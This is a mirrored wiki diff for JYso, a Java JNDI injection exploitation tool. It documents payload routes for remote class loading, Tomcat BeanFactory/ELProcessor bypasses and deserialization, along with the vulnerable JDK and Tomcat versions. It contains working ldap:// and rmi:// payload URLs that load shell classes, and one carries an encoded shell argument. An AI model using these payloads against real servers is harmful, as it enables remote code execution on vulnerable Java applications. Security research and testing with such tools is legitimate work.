mirror of
https://github.com/qi4L/JYso.git
synced 2026-09-25 08:11:53 +08:00
Updated 1 、JNDI Routing (markdown)
+13
-7
@@ -1,11 +1,5 @@
|
||||
JNDI injection payload 的**Gadget与Payload不区分大小写**。
|
||||
|
||||
```
|
||||
对于 JNDI injection payload 是这一处的说明 ----+
|
||||
|
|
||||
ldap://127.0.0.1:1389/TomcatBypass <----------+ /M-EX-MS-TSMSFromJMXS/shell/LXB3IDEyMzQ1Ng==
|
||||
```
|
||||
|
||||
# 远程类加载
|
||||
|
||||
## Basic
|
||||
@@ -13,6 +7,12 @@ ldap://127.0.0.1:1389/TomcatBypass <----------+ /M-EX-MS-TSMSFromJMXS/shell/LXB
|
||||
Oracle JDK 11.0.1, 8u191, 7u201, and 6u211 及以后的版本,为了限制LDAP协议的JNDI利用,将系统属性
|
||||
com.sun.jndi.ldap.object.trustURLCodebase 的默认值设置为 false ,即默认不允许 LDAP 从远程地址加载 objectfactory 类。
|
||||
|
||||
自定义类加载例子
|
||||
```
|
||||
ldap://127.0.0.1:1389/basic/M-LF-shell.class
|
||||
rmi://127.0.0.1:1099/basic/M-LF-shell.class
|
||||
```
|
||||
|
||||
# 本地工厂类加载
|
||||
|
||||
org.apache.naming.factory.BeanFactory
|
||||
@@ -25,7 +25,13 @@ org.apache.naming.factory.BeanFactory
|
||||
9.0.63后forceString选项已作为安全强化措施删除。
|
||||
|
||||
tomcat-embed-core || tomcat-catalina <= 9.0.62 (Spring Boot Starter Tomcat <= 2.6.7)可用。
|
||||
+-
|
||||
|
||||
自定义类加载例子
|
||||
```
|
||||
ldap://127.0.0.1:1389/elprocessor/M-LF-shell.class
|
||||
rmi://127.0.0.1:1099/elprocessor/M-LF-shell.class
|
||||
```
|
||||
|
||||
## Deserialization
|
||||
|
||||
向 javaSerializedData 属性中写入 gadget 的序列化数据
|
||||
|
||||
Reference in New Issue
Block a user